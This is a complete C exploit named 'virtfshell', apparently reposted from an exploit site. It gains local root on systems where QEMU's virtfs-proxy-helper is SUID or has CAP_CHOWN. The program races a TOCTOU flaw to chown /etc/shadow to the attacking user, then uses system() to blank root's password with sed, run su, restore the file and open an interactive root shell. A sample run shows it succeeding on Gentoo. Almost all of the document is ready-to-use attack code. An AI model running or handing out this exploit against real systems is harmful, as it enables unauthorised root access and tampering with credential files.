Gentoo Local Priv Escalation in QEMU

/* == virtfshell ==
 *
 * Some distributions make virtfs-proxy-helper from QEMU either SUID or
 * give it CAP_CHOWN fs capabilities. This is a terrible idea. While
 * virtfs-proxy-helper makes some sort of flimsy check to make sure
 * its socket path doesn't already exist, it is vulnerable to TOCTOU.
 *
 * This should spawn a root shell eventually on vulnerable systems.
 *
 * - zx2c4
 * 2015-12-12
 *
 *
 * zx2c4@thinkpad ~ $ lsb_release -i
 * Distributor ID: Gentoo
 * zx2c4@thinkpad ~ $ ./virtfshell 
 * == Virtfshell - by zx2c4 ==
 * [+] Trying to win race, attempt 749
 * [+] Chown'd /etc/shadow, elevating to root
 * [+] Cleaning up
 * [+] Spawning root shell
 * thinkpad zx2c4 # whoami
 * root
 *
 */
 
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
 
 
static int it_worked(void)
{
    struct stat sbuf = { 0 };
    stat("/etc/shadow", &sbuf);
    return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
 
int main(int argc, char **argv)
{
    int fd;
    pid_t pid;
    char uid[12], gid[12];
    size_t attempts = 0;
 
    sprintf(uid, "%d", getuid());
    sprintf(gid, "%d", getgid());
 
    printf("== Virtfshell - by zx2c4 ==\n");
 
    printf("[+] Beginning race loop\n");
 
    while (!it_worked()) {
        printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
        fd = inotify_init();
        unlink("/tmp/virtfshell/sock");
        mkdir("/tmp/virtfshell", 0777);
        inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
        pid = fork();
        if (pid == -1)
            continue;
        if (!pid) {
            close(0);
            close(1);
            close(2);
            execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
            _exit(1);
        }
        read(fd, 0, 0);
        unlink("/tmp/virtfshell/sock");
        symlink("/etc/shadow", "/tmp/virtfshell/sock");
        close(fd);
        kill(pid, SIGKILL);
        wait(NULL);
    }
 
    printf("[+] Chown'd /etc/shadow, elevating to root\n");
 
    system( "cp /etc/shadow /tmp/original_shadow;"
        "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
        "cat /tmp/modified_shadow > /etc/shadow;"
        "su -c '"
        "   echo [+] Cleaning up;"
        "   cat /tmp/original_shadow > /etc/shadow;"
        "   chown root:root /etc/shadow;"
        "   rm /tmp/modified_shadow /tmp/original_shadow;"
        "   echo [+] Spawning root shell;"
        "   exec /bin/bash -i"
        "'");
    return 0;
}

发表评论